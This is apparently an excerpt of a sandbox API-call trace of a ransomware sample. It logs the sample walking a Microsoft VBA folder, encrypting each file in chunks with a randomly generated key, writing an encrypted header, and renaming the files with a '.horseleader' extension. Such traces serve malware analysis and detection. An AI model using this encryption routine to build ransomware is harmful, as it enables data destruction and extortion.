(lpString1="VBCN6.CHM", lpString2="#Decrypt#.txt") returned 1 [0249.882] lstrcmpW (lpString1="VBCN6.CHM", lpString2="_uninstalling_.png") returned 1 [0249.882] lstrlenW (lpString=".testttjffg") returned 11 [0249.882] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM", lpSrch=".testttjffg") returned 0x0 [0249.882] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0249.882] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0249.884] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbcn6.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0249.884] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM") returned 74 [0249.884] StrStrW (lpFirst="VBCN6.CHM", lpSrch=".txt") returned 0x0 [0249.884] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=109718) returned 1 [0249.885] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0249.885] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0249.997] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0249.997] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0249.997] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xae4b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0249.997] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.055] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.056] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.056] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x15c96, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.056] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.056] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.056] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.056] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.056] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0250.056] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0250.057] CloseHandle (hObject=0x15c) returned 1 [0250.057] GetProcessHeap () returned 0x780000 [0250.057] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e4970 [0250.057] wnsprintfW (in: pszDest=0x7e4970, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM.horseleader") returned 86 [0250.057] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbcn6.chm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBCN6.CHM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbcn6.chm.horseleader")) returned 1 [0250.058] GetProcessHeap () returned 0x780000 [0250.058] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e4970 | out: hHeap=0x780000) returned 1 [0250.058] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f2be900, ftCreationTime.dwHighDateTime=0x1cbc41d, ftLastAccessTime.dwLowDateTime=0xc25685a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x5f2be900, ftLastWriteTime.dwHighDateTime=0x1cbc41d, nFileSizeHigh=0x0, nFileSizeLow=0x25d50, dwReserved0=0x73b8a418, dwReserved1=0x96438c2b, cFileName="VBE7INTL.DLL", cAlternateFileName="")) returned 1 [0250.058] lstrcmpiW (lpString1="VBE7INTL.DLL", lpString2="Windows") returned -1 [0250.058] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBE7INTL.DLL") returned 77 [0250.058] StrStrIW (lpFirst="VBE7INTL.DLL", lpSrch=".horseleader") returned 0x0 [0250.058] lstrcmpW (lpString1="VBE7INTL.DLL", lpString2="#Decrypt#.txt") returned 1 [0250.058] lstrcmpW (lpString1="VBE7INTL.DLL", lpString2="_uninstalling_.png") returned 1 [0250.058] lstrlenW (lpString=".testttjffg") returned 11 [0250.058] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBE7INTL.DLL", lpSrch=".testttjffg") returned 0x0 [0250.058] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0250.058] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0250.058] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBE7INTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbe7intl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0250.340] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBE7INTL.DLL") returned 77 [0250.340] StrStrW (lpFirst="VBE7INTL.DLL", lpSrch=".txt") returned 0x0 [0250.340] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=154960) returned 1 [0250.340] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.340] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.350] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.350] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.352] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x106a8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.352] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.352] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.352] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.353] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x20d50, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.353] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.358] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.358] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.358] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.359] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0250.359] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0250.359] CloseHandle (hObject=0x15c) returned 1 [0250.359] GetProcessHeap () returned 0x780000 [0250.359] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e4970 [0250.359] wnsprintfW (in: pszDest=0x7e4970, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBE7INTL.DLL.horseleader") returned 89 [0250.359] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBE7INTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbe7intl.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBE7INTL.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbe7intl.dll.horseleader")) returned 1 [0250.361] GetProcessHeap () returned 0x780000 [0250.361] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e4970 | out: hHeap=0x780000) returned 1 [0250.361] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d2ba100, ftCreationTime.dwHighDateTime=0x1c685f9, ftLastAccessTime.dwLowDateTime=0xef07e390, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x7d2ba100, ftLastWriteTime.dwHighDateTime=0x1c685f9, nFileSizeHigh=0x0, nFileSizeLow=0x1195f, dwReserved0=0x73b8a418, dwReserved1=0x96438c2b, cFileName="VBENDF98.CHM", cAlternateFileName="")) returned 1 [0250.361] lstrcmpiW (lpString1="VBENDF98.CHM", lpString2="Windows") returned -1 [0250.361] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM") returned 77 [0250.361] StrStrIW (lpFirst="VBENDF98.CHM", lpSrch=".horseleader") returned 0x0 [0250.361] lstrcmpW (lpString1="VBENDF98.CHM", lpString2="#Decrypt#.txt") returned 1 [0250.361] lstrcmpW (lpString1="VBENDF98.CHM", lpString2="_uninstalling_.png") returned 1 [0250.361] lstrlenW (lpString=".testttjffg") returned 11 [0250.361] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM", lpSrch=".testttjffg") returned 0x0 [0250.361] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0250.361] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0250.361] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbendf98.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0250.363] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM") returned 77 [0250.363] StrStrW (lpFirst="VBENDF98.CHM", lpSrch=".txt") returned 0x0 [0250.363] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=72031) returned 1 [0250.363] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.363] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.366] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.366] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.367] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x64af, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.367] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.367] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.368] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.368] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xc95f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.368] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.368] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.368] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.369] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.369] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0250.369] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0250.369] CloseHandle (hObject=0x15c) returned 1 [0250.369] GetProcessHeap () returned 0x780000 [0250.369] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e4970 [0250.369] wnsprintfW (in: pszDest=0x7e4970, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM.horseleader") returned 89 [0250.369] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbendf98.chm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbendf98.chm.horseleader")) returned 1 [0250.370] GetProcessHeap () returned 0x780000 [0250.370] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e4970 | out: hHeap=0x780000) returned 1 [0250.371] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8583dc00, ftCreationTime.dwHighDateTime=0x1c685f9, ftLastAccessTime.dwLowDateTime=0xef07e390, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x8583dc00, ftLastWriteTime.dwHighDateTime=0x1c685f9, nFileSizeHigh=0x0, nFileSizeLow=0xe2aa, dwReserved0=0x73b8a418, dwReserved1=0x96438c2b, cFileName="VBHW6.CHM", cAlternateFileName="")) returned 1 [0250.371] lstrcmpiW (lpString1="VBHW6.CHM", lpString2="Windows") returned -1 [0250.371] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM") returned 74 [0250.371] StrStrIW (lpFirst="VBHW6.CHM", lpSrch=".horseleader") returned 0x0 [0250.371] lstrcmpW (lpString1="VBHW6.CHM", lpString2="#Decrypt#.txt") returned 1 [0250.371] lstrcmpW (lpString1="VBHW6.CHM", lpString2="_uninstalling_.png") returned 1 [0250.371] lstrlenW (lpString=".testttjffg") returned 11 [0250.371] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM", lpSrch=".testttjffg") returned 0x0 [0250.371] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0250.371] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0250.371] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbhw6.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0250.372] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM") returned 74 [0250.372] StrStrW (lpFirst="VBHW6.CHM", lpSrch=".txt") returned 0x0 [0250.372] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=58026) returned 1 [0250.372] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.375] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.375] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.376] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.376] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.376] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0250.377] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x42aa, lpOverlapped=0x0) returned 1 [0250.377] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffbd56, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0250.377] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x42aa, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x42aa, lpOverlapped=0x0) returned 1 [0250.377] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0250.377] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0250.378] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0250.378] CloseHandle (hObject=0x15c) returned 1 [0250.378] GetProcessHeap () returned 0x780000 [0250.378] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e4970 [0250.378] wnsprintfW (in: pszDest=0x7e4970, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM.horseleader") returned 86 [0250.378] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbhw6.chm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbhw6.chm.horseleader")) returned 1 [0250.379] GetProcessHeap () returned 0x780000 [0250.379] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e4970 | out: hHeap=0x780000) returned 1 [0250.379] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x903e7100, ftCreationTime.dwHighDateTime=0x1c685f9, ftLastAccessTime.dwLowDateTime=0xef07e390, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x903e7100, ftLastWriteTime.dwHighDateTime=0x1c685f9, nFileSizeHigh=0x0, nFileSizeLow=0xe6b62, dwReserved0=0x73b8a418, dwReserved1=0x96438c2b, cFileName="VBLR6.CHM", cAlternateFileName="")) returned 1 [0250.379] lstrcmpiW (lpString1="VBLR6.CHM", lpString2="Windows") returned -1 [0250.379] wnsprintfW (in: pszDest=0x7e3120, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBLR6.CHM") returned 74 [0250.379] StrStrIW 